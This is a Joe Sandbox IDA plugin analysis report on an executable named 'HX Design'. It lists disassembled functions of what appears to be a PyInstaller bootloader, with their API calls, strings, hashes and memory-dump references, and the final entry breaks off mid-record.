Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
Instruction ID: 6abbf888d3bef507ff97607c077b66e6df0a285623eb5ece0453c1632daea40a
Opcode Fuzzy Hash: bcbc45470d282000346a2dbbd26572b59944004f25f427ec07b9d33b56543599
Instruction Fuzzy Hash: 9B81A571B0C686A5EB20FB14D0402B9E3A1EF88B84FC48531D98D87796DEBCE54DE764

Function 00007FF732061600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7320617CA
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7320616A2
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7320616DA
Failed to create symbolic link %s!, xrefs: 00007FF732061622
Failed to extract %s: failed to open target file!, xrefs: 00007FF73206165C
fread, xrefs: 00007FF7320617E6
fopen, xrefs: 00007FF732061663
fseek, xrefs: 00007FF7320616E1
fwrite, xrefs: 00007FF7320617D1
malloc, xrefs: 00007FF732061749
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7320617DF
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF732061742

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
Instruction ID: fd6216224f01b94c8a35ccb1669811369356611b9856f716e9b985dda1a0cd91
Opcode Fuzzy Hash: 072a8e60094502cab9b96734686b7b67598e91e59fbdaf3113bd79295414d11d
Instruction Fuzzy Hash: 7251A021B08643B2EA10BB25D4001BAE3A0FF84B94FC44531EE9C47B96DEBCE55DE764

Function 00007FF732068660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF732063CBB), ref: 00007FF732068704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF732063CBB), ref: 00007FF73206870A
CreateDirectoryW.KERNELBASE(?,00000000,00007FF732063CBB), ref: 00007FF73206874C

Part of subcall function 00007FF732068830: GetEnvironmentVariableW.KERNEL32(00007FF73206388E), ref: 00007FF732068867
Part of subcall function 00007FF732068830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF732068889

Part of subcall function 00007FF732078238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732078251

Part of subcall function 00007FF732062810: MessageBoxW.USER32 ref: 00007FF7320628EA

Strings

LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF73206877E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF7320686DC
TMP, xrefs: 00007FF7320686C2
TMP, xrefs: 00007FF73206869C, 00007FF7320687A3
_MEI%d, xrefs: 00007FF732068712

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction ID: d0dd66a154c182609d2c8bcf00ad31e4365669649a75384d994d52692b1424e4
Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction Fuzzy Hash: 1D41C611B19642A4FA10FB25B8952BAD291EF84BC0FC00131ED4D47BDAEEBCE50DE324

Function 00007FF732061210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7320612EF
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7320612BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF732061276
malloc, xrefs: 00007FF7320612C1, 00007FF7320612F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF73206141E
1.3.1, xrefs: 00007FF732061249

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
Instruction ID: 7ba33010c38cec13a7fd246382fb8c393174fd09f7c6121060df5aca34d75fb0
Opcode Fuzzy Hash: c68ada16c8054f5beab9184a2d33c9fb43cd0d4882f5edf9030f6e60bcef94b6
Instruction Fuzzy Hash: 3A510B22B0864265EA20BB15E4403BAE391FF84B94FC84131ED8D47BD5EFBCE549E724

Function 00007FF73207ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF73207F0AA,?,?,-00000018,00007FF73207AD53,?,?,?,00007FF73207AC4A,?,?,?,00007FF732075F3E), ref: 00007FF73207EE8C
GetProcAddress.KERNEL32(?,?,?,00007FF73207F0AA,?,?,-00000018,00007FF73207AD53,?,?,?,00007FF73207AC4A,?,?,?,00007FF732075F3E), ref: 00007FF73207EE98

Strings

api-ms-, xrefs: 00007FF73207EDD6
ext-ms-, xrefs: 00007FF73207EDE9

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 1ae3251433425d48dc2999c71131b0912bad1daea6f160dbf7a7001fc4b6ab02
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: A1412831B1AA02A1FA15FB1A9800675A391FF48B90FC84535DD1D47394EFBCE84DE360

Function 00007FF7320636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF732063804), ref: 00007FF7320636E1
GetLastError.KERNEL32(?,00007FF732063804), ref: 00007FF7320636EB

Part of subcall function 00007FF732062C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
Part of subcall function 00007FF732062C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
Part of subcall function 00007FF732062C50: MessageBoxW.USER32 ref: 00007FF732062D99

Strings

Failed to resolve full path to executable %ls., xrefs: 00007FF732063739
Failed to convert executable path to UTF-8., xrefs: 00007FF732063790
GetModuleFileNameW, xrefs: 00007FF7320636FA
\\?\, xrefs: 00007FF73206375A
Failed to obtain executable path., xrefs: 00007FF7320636F3

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction ID: b618fc54f69114c14a619e3fe3a4bbddf1446a396af661121fa170e6144b99cd
Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
Instruction Fuzzy Hash: BD219561B1864261FA30B724EC543BAE2A0FF88754FC00232D65D825D5EEACE50DE768

Function 00007FF73207BA5C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207BE89

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
Instruction ID: 4a19d13d763459d487f822cfd77626a00406124f9568a92944f9add027675a12
Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
Instruction Fuzzy Hash: EBC1D82290C686A2E760BB1994402BEF760FB85B90FD54131EA4E07791DFFCE85DE720

Function 00007FF732068570 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF732068590
OpenProcessToken.ADVAPI32 ref: 00007FF7320685A3
GetTokenInformation.KERNELBASE ref: 00007FF7320685C8
GetLastError.KERNEL32 ref: 00007FF7320685D2
GetTokenInformation.KERNELBASE ref: 00007FF732068612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF73206862E
CloseHandle.KERNEL32 ref: 00007FF732068646

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction ID: 99ab8d3462857a18c1737d43d3f8125bc7726cb1d0dcaa71e4af67ac107d6d1d
Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
Instruction Fuzzy Hash: B9213231B0CA4252EB50AB55B58423AE3A0FF857A0F900235EA6D83BE5DEFCD44DDB14

Function 00007FF7320690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF732068570: GetCurrentProcess.KERNEL32 ref: 00007FF732068590
Part of subcall function 00007FF732068570: OpenProcessToken.ADVAPI32 ref: 00007FF7320685A3
Part of subcall function 00007FF732068570: GetTokenInformation.KERNELBASE ref: 00007FF7320685C8
Part of subcall function 00007FF732068570: GetLastError.KERNEL32 ref: 00007FF7320685D2
Part of subcall function 00007FF732068570: GetTokenInformation.KERNELBASE ref: 00007FF732068612
Part of subcall function 00007FF732068570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF73206862E
Part of subcall function 00007FF732068570: CloseHandle.KERNEL32 ref: 00007FF732068646

LocalFree.KERNEL32(?,00007FF732063C55), ref: 00007FF73206916C
LocalFree.KERNEL32(?,00007FF732063C55), ref: 00007FF732069175

Strings

S-1-3-4, xrefs: 00007FF732069121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF732069142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF732069183
D:(A;;FA;;;%s), xrefs: 00007FF732069157

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
Instruction ID: acf6b1592f859a49830db41f1cc66abec1b0fdd65fac89753ce5a9c2fc968da1
Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
Instruction Fuzzy Hash: 2C216231B08742A1F610BB20E5152FAE261FF84780FD44036EA4D57B96DFBCD849E760

Function 00007FF732067E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000000,?,00007FF73206352C,?,00000000,00007FF732063F23), ref: 00007FF732067F32

Strings

%s%c, xrefs: 00007FF732067EA4
%.*s, xrefs: 00007FF732067EEB
\, xrefs: 00007FF732067E97

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction ID: cb5503d9ef1ce6fb035f8cc693bb8ebce0ff3813b2026f86c57c645c16a20f8e
Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction Fuzzy Hash: A1312821719AC165FA21AB20E8107AAA354EF84BE0F800231EE6D47BD9EF7CD649D714

Function 00007FF73207CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73207CF4B), ref: 00007FF73207D07C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF73207CF4B), ref: 00007FF73207D107

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: 9844f4bf710d9e253e86d0feab19913dfb1c066e20067fca83d4801b33b2f880
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: 5D910832F08651B5F760FF69944027DABA0BB54B88F944139DE1E57A84CFBCD44AD720

Function 00007FF73207F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF73207FA7C
_get_daylight.LIBCMT ref: 00007FF73207FA8D
_get_daylight.LIBCMT ref: 00007FF73207FA9E
_isindst.LIBCMT ref: 00007FF73207FB69

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: 4bb68b1999a5f0fd7d390b880599b61f40378b254580015dbdf67592ec937396
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: 93516C72F04211A6FB14FF68D8596BCA7B1AF40358F900236DD2E52AE5DF7CA40AD710

Function 00007FF73207577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF7320757AF
GetFileInformationByHandle.KERNELBASE ref: 00007FF732075811
GetLastError.KERNEL32 ref: 00007FF7320758A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7320756B4), ref: 00007FF7320758EE

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
Instruction ID: b1d3085229a13e1b89190dbefc57157f28a68d0ee3fa6b06382b4c94098d03a0
Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
Instruction Fuzzy Hash: 29519E22E086419AFB50FFB4D4503BDBBA1AB48B58F908435DE0D57A89DFB8D449D320

Function 00007FF732075628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732075655
CreateFileW.KERNELBASE ref: 00007FF732075694
CloseHandle.KERNEL32 ref: 00007FF7320756C9

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction ID: a88995a32b805eaf733e4967039d5cbe0c8f053d25ba20d1071f0a3bfc24d80d
Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction Fuzzy Hash: 4741C822E1878193F750BB6495103B9B760FB94764F508335EAAC07AD1DFBCA1E4D720

Function 00007FF73206CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF73206CE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF73206CE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF73206CC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF73206CCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF73206CD21

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 0fbfbcdd6c9f05539b51e2fa2716257d61b27fea095dab5dc16ee6e8bec5e937
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: 7C316C20F0C14775FA54BB64942A3B9A291EF55384FC45434DA4E4B2E3DEECB80CE238

Function 00007FF732079A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF732079A2C), ref: 00007FF732079A41
TerminateProcess.KERNEL32(?,?,?,00007FF732079A2C), ref: 00007FF732079A4C
ExitProcess.KERNEL32 ref: 00007FF732079A5B

Memory Dump Source

Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
